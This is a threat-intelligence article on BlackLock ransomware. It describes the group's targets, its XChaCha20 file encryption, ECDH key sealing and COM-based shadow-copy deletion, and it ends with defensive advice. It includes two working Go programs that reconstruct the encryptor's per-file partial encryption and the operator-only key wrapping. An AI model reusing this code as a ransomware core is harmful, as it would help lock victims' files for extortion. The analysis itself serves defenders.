BlackLock Ransomware: New Cross-Platform Threat Targets Windows, Linux, and VMware
The BlackLock group, formerly known as El Dorado, has in recent months established itself as one of the most prominent actors in the ransomware arena. Research by the AhnLab Security Intelligence Center (ASEC) reveals that its developers have engineered a cross-platform encryption tool designed to simultaneously target Windows, Linux, and VMware ESXi systems. Such versatility allows operators to strike at mixed infrastructures without being confined to a single operating system.
Data leaks posted on BlackLock’s dedicated site first surfaced in the summer of 2024, though forensic traces suggest that activity has been ongoing since at least March of that year. The majority of recorded incidents involved companies and municipal organizations in the United States, but attacks have also been documented in South Korea, Japan, several European nations, and beyond.
Victims have included educational and research institutions, transportation providers, construction and manufacturing firms, and even leisure venues such as golf clubs. According to ASEC, the group operates under a “ransomware-as-a-service” model.
BlackLock’s encryptor is written in Go and built on standard, widely used libraries, which keeps development simple and the binary stable. On execution it parses its command-line arguments, so an affiliate can tune each run: which directories to encrypt, a start delay, the percentage of each file to encrypt (partial encryption trades completeness for speed on large files), the number of worker threads, and whether to scan for remote SMB shares. The code also carries a flag for VMware-specific handling, but in the samples ASEC analyzed that module is not fully implemented.
At its core the malware uses the ChaCha20 stream cipher, specifically the XChaCha20 variant provided by Go’s x/crypto packages (golang.org/x/crypto/chacha20). For each file it generates a fresh 32-byte key and a 24-byte nonce (the extended nonce is what distinguishes XChaCha20 from plain ChaCha20 and its 12-byte nonce), builds the cipher from them, and XORs the file contents with the keystream through the cipher’s XORKeyStream method. A stream cipher is only safe while no key/nonce pair is ever reused, which is why the pair is unique per file; XORKeyStream is unauthenticated, so the output is ciphertext only, with no tag.
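To make the per-file step concrete, here is an added example; it is not BlackLock’s code or ASEC’s, and it is written against the Go standard library only, so it runs without golang.org/x/crypto. It implements XChaCha20 from scratch (HChaCha20 subkey derivation, then ChaCha20 with the 8-byte nonce tail), exposes an `xchacha20XOR` function equivalent to XORKeyStream, generates a fresh 32-byte key and 24-byte nonce per file, and adds the partial-encryption percentage from the command-line options above. The function names, the `encryptFile` helper and the sample file body are my own assumptions; the two known-answer vectors come from RFC 8439 §2.3.2 and the IETF XChaCha20 draft (draft-irtf-cfrg-xchacha).

```go
package main

import (
	"crypto/rand"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"math/bits"
)

func quarterRound(s *[16]uint32, a, b, c, d int) {
	s[a] += s[b]; s[d] = bits.RotateLeft32(s[d]^s[a], 16)
	s[c] += s[d]; s[b] = bits.RotateLeft32(s[b]^s[c], 12)
	s[a] += s[b]; s[d] = bits.RotateLeft32(s[d]^s[a], 8)
	s[c] += s[d]; s[b] = bits.RotateLeft32(s[b]^s[c], 7)
}

// setup lays out the RFC 8439 state: constants | 256-bit key | 16 bytes of counter||nonce.
func setup(key [32]byte, tail []byte) (s [16]uint32) {
	s[0], s[1], s[2], s[3] = 0x61707865, 0x3320646e, 0x79622d32, 0x6b206574 // "expand 32-byte k"
	kt := append(key[:], tail...) // key is a by-value copy, so append allocates a fresh slice
	for i := 0; i < 12; i++ {
		s[4+i] = binary.LittleEndian.Uint32(kt[4*i:])
	}
	return
}

func rounds(s *[16]uint32) {
	for i := 0; i < 10; i++ { // 10 double rounds = 20 rounds
		quarterRound(s, 0, 4, 8, 12); quarterRound(s, 1, 5, 9, 13)
		quarterRound(s, 2, 6, 10, 14); quarterRound(s, 3, 7, 11, 15)
		quarterRound(s, 0, 5, 10, 15); quarterRound(s, 1, 6, 11, 12)
		quarterRound(s, 2, 7, 8, 13); quarterRound(s, 3, 4, 9, 14)
	}
}

// chachaBlock returns one 64-byte keystream block; tail is the 4-byte counter + 12-byte nonce.
func chachaBlock(key [32]byte, tail []byte) (out [64]byte) {
	in := setup(key, tail)
	s := in
	rounds(&s)
	for i := range s {
		binary.LittleEndian.PutUint32(out[4*i:], s[i]+in[i]) // feed-forward
	}
	return
}

// hchacha20 derives the XChaCha20 subkey from key + first 16 nonce bytes: no feed-forward, keep words 0-3 and 12-15.
func hchacha20(key [32]byte, nonce16 []byte) (sub [32]byte) {
	s := setup(key, nonce16)
	rounds(&s)
	for i := 0; i < 4; i++ {
		binary.LittleEndian.PutUint32(sub[4*i:], s[i])
		binary.LittleEndian.PutUint32(sub[16+4*i:], s[12+i])
	}
	return
}

// xchacha20XOR is the XORKeyStream equivalent for a 24-byte nonce: HChaCha20 subkey, then ChaCha20 with nonce 0x00000000 || nonce[16:24], counter from 0.
func xchacha20XOR(dst, src []byte, key [32]byte, nonce [24]byte) {
	sub := hchacha20(key, nonce[:16])
	var tail [16]byte // counter || 0x00000000 || nonce[16:24]
	copy(tail[8:], nonce[16:])
	for i, ctr := 0, uint32(0); i < len(src); ctr++ {
		binary.LittleEndian.PutUint32(tail[:], ctr)
		ks := chachaBlock(sub, tail[:])
		for j := 0; j < 64 && i < len(src); j, i = j+1, i+1 {
			dst[i] = src[i] ^ ks[j]
		}
	}
}

// encryptFile mirrors the per-file step: fresh 32-byte key and 24-byte nonce per file; with pct < 100 only the leading pct% of the bytes goes through the cipher.
func encryptFile(plain []byte, pct int) (out []byte, key [32]byte, nonce [24]byte, err error) {
	if _, err = rand.Read(key[:]); err != nil {
		return
	}
	if _, err = rand.Read(nonce[:]); err != nil {
		return
	}
	out = append([]byte(nil), plain...)
	n := len(plain) * pct / 100
	xchacha20XOR(out[:n], plain[:n], key, nonce)
	return
}

// knownAnswerOK checks the RFC 8439 §2.3.2 block vector (counter 1) and the draft-irtf-cfrg-xchacha HChaCha20 vector, both with key 00 01 02 ... 1f.
func knownAnswerOK() bool {
	var key [32]byte
	for i := range key { key[i] = byte(i) }
	blk := chachaBlock(key, []byte{1, 0, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0x4a, 0, 0, 0, 0})
	sub := hchacha20(key, []byte{0, 0, 0, 9, 0, 0, 0, 0x4a, 0, 0, 0, 0, 0x31, 0x41, 0x59, 0x27})
	return hex.EncodeToString(blk[:16]) == "10f1e7e4d13b5915500fdd1fa32071c4" &&
		hex.EncodeToString(sub[:]) == "82413b4227b27bfed30e42508a877d73a0f9e4d58a74a853c12ec41326d3ecdc"
}

func main() {
	ct, _, _, _ := encryptFile([]byte("constructed sample file body, 60% of it encrypted"), 60)
	fmt.Printf("vectors ok: %v\nciphertext: %x\n", knownAnswerOK(), ct)
}
```

Because the cipher is a pure XOR, calling `xchacha20XOR` a second time with the same key, nonce and byte range recovers the plaintext; that symmetry is exactly what the appended, sealed key material in the next paragraph exists to protect.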
So that files can be recovered once a ransom is paid, the per-file key and nonce are appended to each encrypted file as a sealed metadata block. They are not stored in the clear: the malware performs an Elliptic Curve Diffie-Hellman exchange against the operators’ public key and seals the key and nonce with secretbox.Seal() (golang.org/x/crypto/nacl/secretbox) under the resulting shared secret. Opening the box needs the operators’ private component, which never reaches the victim’s machine, so the appended metadata cannot be turned back into working keys by anyone else.
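The key-wrapping step, as an added example that is not the ransomware’s code or ASEC’s: a fresh X25519 key pair per file, ECDH against the operators’ public key, and an authenticated seal of key||nonce that is appended to the file as a footer. To stay within the Go standard library the example uses crypto/ecdh for X25519 and SHA-256 plus AES-256-GCM in place of secretbox.Seal() (XSalsa20-Poly1305); the footer layout, the function names and the constructed per-file secrets are my own assumptions. The structure, and the property that nothing stored in the file recovers the key without the operator private key, is the same as with secretbox.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// Assumed footer layout: [32-byte ephemeral X25519 public key][12-byte AEAD nonce][key||nonce (56 B) + 16-byte tag].
const footerLen = 32 + 12 + 56 + 16

// sharedAEAD runs X25519 and turns the shared secret into an AEAD; stands in for secretbox (SHA-256 as KDF, AES-256-GCM as cipher).
func sharedAEAD(priv *ecdh.PrivateKey, pub *ecdh.PublicKey) (cipher.AEAD, error) {
	shared, err := priv.ECDH(pub)
	if err != nil {
		return nil, err
	}
	k := sha256.Sum256(shared)
	block, err := aes.NewCipher(k[:])
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// wrapFileSecrets seals fileKey||fileNonce under a fresh per-file X25519 key pair so that only the operator private key can open it.
func wrapFileSecrets(operatorPub *ecdh.PublicKey, fileKey [32]byte, fileNonce [24]byte) ([]byte, error) {
	eph, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	aead, err := sharedAEAD(eph, operatorPub)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	ephPub := eph.PublicKey().Bytes()
	payload := append(fileKey[:], fileNonce[:]...)
	return aead.Seal(append(ephPub, nonce...), nonce, payload, ephPub), nil // ephemeral pub is in the clear but bound as AAD
}

// unwrapFileSecrets is the decryptor-side step; without operatorPriv the shared secret is unreachable and Open fails on the tag.
func unwrapFileSecrets(operatorPriv *ecdh.PrivateKey, footer []byte) (fileKey [32]byte, fileNonce [24]byte, err error) {
	if len(footer) != footerLen {
		return fileKey, fileNonce, fmt.Errorf("bad footer length: %d bytes", len(footer))
	}
	ephPub, err := ecdh.X25519().NewPublicKey(footer[:32])
	if err != nil {
		return fileKey, fileNonce, err
	}
	aead, err := sharedAEAD(operatorPriv, ephPub)
	if err != nil {
		return fileKey, fileNonce, err
	}
	payload, err := aead.Open(nil, footer[32:44], footer[44:], footer[:32])
	if err != nil {
		return fileKey, fileNonce, err
	}
	copy(fileKey[:], payload[:32])
	copy(fileNonce[:], payload[32:])
	return fileKey, fileNonce, nil
}

// demo wraps constructed per-file secrets, recovers them with the operator key, and shows that any other key is rejected.
func demo() (recovered, wrongKeyRejected bool, err error) {
	operator, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return
	}
	fileKey := sha256.Sum256([]byte("constructed per-file key, not a real one"))
	var fileNonce [24]byte
	copy(fileNonce[:], "constructed per-file nonce")
	footer, err := wrapFileSecrets(operator.PublicKey(), fileKey, fileNonce)
	if err != nil {
		return
	}
	k, n, err := unwrapFileSecrets(operator, footer)
	if err != nil {
		return
	}
	recovered = k == fileKey && n == fileNonce
	other, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return
	}
	_, _, openErr := unwrapFileSecrets(other, footer)
	wrongKeyRejected = openErr != nil
	return
}

func main() {
	fmt.Println(demo()) // prints: true true <nil>
}
```

The point a responder should take from this is what is recoverable from disk: the ephemeral public key and the sealed box are both in the footer, but neither helps without the operator private key, so there is no offline path from a ransomed file to its ChaCha key.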
Particularly notable is how it removes backups. Instead of issuing WMI commands directly, the malware instantiates a COM object and runs in-memory shellcode to delete Volume Shadow Copy snapshots and empty the Recycle Bin. Performing the deletion in-process through COM rather than through a spawned command-line tool leaves less of the telemetry that traditional monitoring keys on, which makes the step harder to detect. Victims are left with files renamed to random extensions and a ransom note titled HOW_RETURN_YOUR_DATA.TXT in every directory, threatening business disruption and publication of stolen data if negotiations are refused.
Analysis underscores that BlackLock is evolving toward greater flexibility and internal sophistication. Defenses should therefore combine network segmentation, timely patching, layered endpoint and network protection, and backups kept in an isolated environment and regularly restore-tested, since on-host shadow copies are exactly what the malware destroys. As ransomware increasingly targets Windows, Linux, and ESXi alike, only a blend of proactive safeguards and rapid incident response can mitigate the damage this family of attacks causes.